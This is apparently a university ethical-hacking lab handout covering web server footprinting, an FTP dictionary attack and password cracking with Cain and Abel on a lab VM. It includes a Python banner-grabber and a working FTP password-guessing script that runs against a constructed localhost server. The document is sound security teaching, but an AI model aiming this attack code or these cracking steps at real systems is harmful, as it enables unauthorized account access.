In-Class Assignment 2 (5 Marks)
A: Footprint the Web Server (3 Marks)
Scenario
The first step of hacking web servers for a professional ethical hacker or pen tester is to
collect as much information as possible about the target web server and analyze the
collected information in order to find lapses in its current security mechanisms. The
main purpose is to learn about the web server’s remote access capabilities, its ports
and services, and other aspects of its security.
The information obtained in this step helps in assessing the security posture of the web
server. Footprinting may involve searching the Internet, newsgroups, bulletin boards,
etc. for gathering information about the target organization’s web server. There are also
tools such as [Link] and Whois Lookup that extract information such as the target’s
domain name, IP address, and autonomous system number.
Web server fingerprinting is an essential task for any penetration tester. Before
proceeding to attack or exploit a web server, the penetration tester must know the type
and version of the web server, because most attacks and exploits are specific to the type
and version of the server the target is running. These methods help the penetration
tester gather information about and analyze the target so that they can perform a thorough
test and recommend appropriate measures to mitigate such attacks on the server.
An ethical hacker or penetration tester must perform footprinting to detect the
loopholes in the web server of the target organization. This will help in predicting the
effectiveness of additional security measures for strengthening and protecting the web
server of the target organization.
This exercise demonstrates how to footprint a web server using various footprinting
tools and techniques.
Assignment
1. Highlight methods of information gathering using Ghost Eye.
2. Explain web server reconnaissance using Skipfish.
3. Mention three tools to footprint a web server.
4. Highlight how to perform enumeration of web server information using Nmap.
5. Choose one live example and go step by step through the environment to conduct the
analysis (screenshots).
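As an added example (this is not part of the handout and not code from Nmap, Skipfish or Ghost Eye), the Python script below shows the banner-grabbing step that underlies service-version detection in Nmap (-sV) and the other footprinting tools: it sends a HEAD request, parses the Server and X-Powered-By headers into product, version and OS fields, and records what the server discloses. So that it runs offline it starts a throwaway local HTTP server whose banner values (Apache/2.4.41 (Ubuntu), PHP/7.4.3) are constructed for the example; to use it for real, call grab_banner() against a host you are authorized to test.

```python
import http.client
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target for this example: a throwaway local HTTP server whose
# Server and X-Powered-By banners are made-up values, so the fingerprinting
# code below has something realistic to read without touching a real host.
class LeakyHandler(BaseHTTPRequestHandler):
    server_version = "Apache/2.4.41"   # BaseHTTPRequestHandler emits this in the Server header
    sys_version = "(Ubuntu)"           # appended after server_version

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("X-Powered-By", "PHP/7.4.3")
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):      # keep the demo quiet
        pass

# "Product/version (comment)" as found in Server and X-Powered-By headers.
BANNER_RE = re.compile(r"^(?P<product>[A-Za-z][\w.-]*)(?:/(?P<version>[\w.]+))?(?:\s+\((?P<os>[^)]*)\))?")

def parse_banner(value):
    """Split a banner string into product, version and OS/comment fields."""
    m = BANNER_RE.match(value.strip())
    if not m:
        return {"product": value.strip(), "version": None, "os": None}
    return m.groupdict()

def grab_banner(host, port, timeout=3.0):
    """Send a HEAD request and fingerprint the server from its response headers."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/", headers={"User-Agent": "banner-check/0.1"})
        resp = conn.getresponse()
        status = resp.status
        headers = {name.lower(): value for name, value in resp.getheaders()}
    finally:
        conn.close()

    result = {"status": status, "server": None, "powered_by": None, "findings": []}
    if "server" in headers:
        result["server"] = parse_banner(headers["server"])
        if result["server"]["version"]:
            result["findings"].append("Server header discloses product version")
    if "x-powered-by" in headers:
        result["powered_by"] = parse_banner(headers["x-powered-by"])
        result["findings"].append("X-Powered-By header discloses application platform")
    return result

def run_demo():
    """Start the constructed target on an ephemeral localhost port, fingerprint it, shut it down."""
    httpd = HTTPServer(("127.0.0.1", 0), LeakyHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    try:
        return grab_banner("127.0.0.1", httpd.server_address[1])
    finally:
        httpd.shutdown()
        httpd.server_close()

if __name__ == "__main__":
    print(run_demo())
```

The same parser handles banners such as Microsoft-IIS/10.0 or a bare nginx (no version), which is what a hardened server should return; the findings list is the evidence you would cite when recommending that ServerTokens/expose_php-style settings be tightened. Nmap reaches the same conclusion from the raw socket, and its probes cover many more protocols than HTTP.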
B: Perform a Web Server Attack
Scenario
After gathering the required information about the target web server, the next task for
an ethical hacker or pentester is to attack the web server in order to test the target
network’s web server security infrastructure. This requires knowledge of how to perform
web server attacks.
Attackers perform web server attacks with certain goals in mind. These goals may be
technical or non-technical. For example, attackers may breach the security of the
web server to steal sensitive information for financial gain, or merely out of curiosity.
To obtain the necessary passwords, the attacker tries every available technique, including
password guessing, dictionary attacks, brute force attacks, hybrid attacks, pre-computed
hashes, rule-based attacks, distributed network attacks, and rainbow table attacks.
The attacker needs patience, as some of these techniques are tedious and time-
consuming. The attacker can also use automated tools such as Brutus and THC-Hydra
to crack web passwords.
An ethical hacker or pentester must test the company’s web server against various
attacks and other vulnerabilities. It is important to find various ways to extend the
security test by analyzing web servers and employing multiple testing techniques. This
will help to predict the effectiveness of additional security measures for strengthening
and protecting the web servers of the organization.
Assignment (2 Marks)
1. Explain how to crack FTP credentials using a dictionary attack.
2. Choose one live example and go step by step through the environment to conduct the
analysis.
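As an added example, not taken from the handout or from THC-Hydra, here is the FTP dictionary attack written out in Python so that the protocol exchange is visible: each candidate password is tried with USER/PASS, a 230 reply means the login succeeded and a 530 reply (raised by ftplib as error_perm) means move on to the next word. So that it runs offline it includes a constructed minimal FTP server on localhost with the assumed credential ftpuser/rain and a constructed five-word wordlist.

```python
import ftplib
import socketserver
import threading

# Constructed target: a minimal FTP server that implements just enough of the
# protocol (USER/PASS/QUIT) to accept or reject a login, so the attack below
# runs entirely on localhost. The credential is an assumption for this example.
VALID_CREDENTIALS = {"ftpuser": "rain"}

class MiniFTPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        self.wfile.write(b"220 mini-ftp ready\r\n")
        user = None
        while True:
            line = self.rfile.readline()
            if not line:                        # client closed the connection
                break
            cmd, _, arg = line.decode("latin-1").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self.wfile.write(b"331 Password required\r\n")
            elif cmd == "PASS":
                if user is not None and VALID_CREDENTIALS.get(user) == arg:
                    self.wfile.write(b"230 Login successful\r\n")
                else:
                    self.wfile.write(b"530 Login incorrect\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"221 Goodbye\r\n")
                break
            else:
                self.wfile.write(b"502 Command not implemented\r\n")

class MiniFTPServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

def ftp_dictionary_attack(host, port, username, wordlist, timeout=3.0):
    """Try each candidate password over a fresh FTP connection; stop at the first 230 reply.
    A 530 reply surfaces as ftplib.error_perm, which is the 'wrong password' signal."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        ftp = ftplib.FTP()
        try:
            ftp.connect(host, port, timeout=timeout)
            ftp.login(username, candidate)
            return {"password": candidate, "attempts": attempts}
        except ftplib.error_perm:
            pass                                # 530: wrong password, try the next word
        finally:
            ftp.close()
    return {"password": None, "attempts": attempts}

def run_demo():
    """Start the constructed target on an ephemeral port and attack it with a constructed wordlist."""
    wordlist = ["123456", "password", "qwerty", "rain", "letmein"]   # constructed sample
    server = MiniFTPServer(("127.0.0.1", 0), MiniFTPHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return ftp_dictionary_attack("127.0.0.1", server.server_address[1], "ftpuser", wordlist)
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    print(run_demo())
```

Hydra does the same work with parallel connections and several PASS attempts per connection; this version opens a new connection per attempt, which is slower but shows exactly what the server's log will record, a burst of 530 replies for one username from one source. Run it only against systems you are authorized to test, and expect account lockout or rate limiting on anything that is not a lab box.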
C: Password cracking (10 marks)
Note:
This lab deliberately does not give you all the information you need to complete it.
You are expected to do the appropriate research and reading to get the information you need to
complete the lab.
Objective:
1. Creating accounts to be cracked
2. Cracking passwords by Brute Force
3. Cracking passwords by Dictionary
The Lab Activities
Part 1: Am I Cracked?
Take a screenshot.
Before looking at cracking passwords you may be wondering if anyone has possibly cracked your
passwords, or at least, got a hold of your personal data in some fashion. Another way to ask that
question is to ask yourself: “Have I been pwned?”
If you do not know what ‘pwn’ means, have a look at the definition: [Link]
If you really want to know, one way to check this is to go to the following website… you may be
surprised:
[Link]
Part 2: Creating User Accounts
Download the Windows VM from here. XP_Windows_SA.ova
Before we can look at cracking passwords, first we need to create some user accounts. On your
Windows VM create the following accounts with the associated passwords:
Account   Password
user1     lmn*
user2     wsxe42
user3     password
user4     rain
Part 3: Cracking Passwords – Local Microsoft System Passwords
In this part of the lab you will be using Cain and Abel to crack passwords. Cain and Abel can do a lot
more than just crack passwords, though for this lab that is all we are going to use it for.
Note: Before you start this part of the assignment there are a number of things you need to ensure:
1. You are logged into the Administrator account. This just makes the lab a little simpler to do.
2. You have found Cain and Abel and installed it. [Link]
3. Security software is disabled for the duration of this activity. Turn off the firewall and
antivirus to download and install the file (otherwise the virus scanner will block the install,
since Cain is flagged as a hacking tool). Do this only inside the isolated lab VM.
4. At the end of installation it may say that it uses WinPcap v4.1.3 and ask if you want to install
it. If that installation fails on your computer (an error message saying that it is not supported by
your version of Windows), Cain will be installed but will not run without it. You can go to
[Link] and install WinPcap v4.1.3 yourself. Launching Cain after this should work with no
additional installation required.
5. ‘Abel’ has been installed into the correct directory (check the manual to find the correct
directory). [Link]
6. The Abel service is ‘started’.
Note:
In Cain there is a drop-down list of predefined character sets. In a real scenario you, as the attacker,
do not know the password, so you have to use the larger character sets, and yes, that takes time. In
our case it takes even longer, since we do not have fast processors for this kind of work and virtual
machines make it slower still. Thus, in this assignment, since you already know what the password
is, you can take a shortcut and choose the character set accordingly.
Set Up Steps
1. Start Cain and click the Network tab.
2. In the left pane, right-click Quick List and select “Add to Quick List”.
3. Enter your computer name or Windows IP Address in the text box and click OK.
4. Expand the Quick List and double click on your IP address.
5. Expand Abel and select Hashes. A Cain box pops up asking "Include password history hashes?".
Click ‘No’. The password hashes should appear.
NB: there are two hash values per account. LM hashes exist for backward compatibility with Win9x
systems and NT hashes are used by NT\2000\XP\Windows 7 systems. The LM hash is much weaker (it
upper-cases the password and hashes it as two independent 7-character halves), and Windows XP stores
it by default for any password of 14 characters or fewer, which is something a real-world tester
checks for; the steps below attack the NTLM (NT) hashes.
6. Right-click in the right pane and click "Send All to Cracker".
Brute Force Cracking Steps
1. Click the Cracker tab. In the right pane, right-click user1, select “Brute-Force Attack”, and click
“NTLM Hashes”.
2. In the “Brute-Force Attack” box, click the Start button. It should find the four-character password
in a few seconds. Take a screenshot that includes the Brute-Force Attack box open with the
cracked password and save it.
3. Close the “Brute-Force Attack” box.
4. Brute-force attack user2. You will find the six-character password (letters and digits) is harder to
crack. It will take approximately 10 minutes, depending on the speed of your processor.
5. Take a screenshot that includes the Brute-Force Attack box open with the cracked password and
save it.
Dictionary Cracking Steps:
While still using Cain…
1. In the right pane, right-click user3, point to "Dictionary Attack", and click "NTLM Hashes". Cain
should FAIL to crack the hash.
Close the “Dictionary Attack” window.
2. A dictionary attack is really a word list attack where every word in the dictionary (wordlist) is
checked. Dictionary attacks are more efficient than brute force but may not be successful if the
dictionary does not contain the word.
To increase the probability of cracking the password there are two approaches: use a more
comprehensive list, or include string manipulation to increase the chance of matching the
password, e.g. reversing the word, or adding numbers to the beginning or end.
3. Right-click on user3 again, select “Dictionary Attack” and click “NTLM Hashes”.
At the top of the “Dictionary Attack” box, right-click the file box and select Add to list. Browse to
the location of the dictionary installed by Cain & Abel. When the file is added, click the Start
button. This time Cain should SUCCEED in cracking the hash. Take a screenshot that includes the
Dictionary Attack box open with the cracked password and save it.
Right-click in the file area, select “Remove All” and confirm by clicking “Yes”.
Close the Dictionary Attack window.
4. Download the document 1k_most_common.txt from the Assignment folder and save the file.
Move it into the Cain Wordlists directory (probably C:\Program Files (x86)\Cain\Wordlists).
5. Perform a dictionary attack on user4 using the 1k_most_common.txt dictionary. When the file is
loaded, click Start. Cain should FAIL to crack the hash. Close the “Dictionary Attack” window.
6. Navigate to the file 1k_most_common.txt and open it in Notepad.
7. Scroll down and scan the list of words commonly used for passwords. Notice that the word
“password” is in the list, but the word “rain” is not.
8. Edit the 1k_most_common.txt file and add the word “rain”.
Open the File menu and click on the Save item.
Repeat the dictionary attack on user4 and this time Cain should SUCCEED in cracking the hash. Take a
screenshot that includes the Dictionary Attack box open with the cracked password and save it.
Once all the passwords are cracked, insert the four (4) saved images of cracked passwords into your
report under the heading of “Cracked Passwords”.
Deliverable
Submit all the screenshots in one report and submit it in Moodle.
Your lab report should contain the students’ names and numbers (or a cover page).
For each part of the lab use a heading such as “Part 1” or “In-class activity 2 - Creating User
Accounts”.
In all screenshots, part of the custom background (wallpaper) and the system time and date should be
visible.
Be consistent in font type and size, and do not use a size bigger than 12.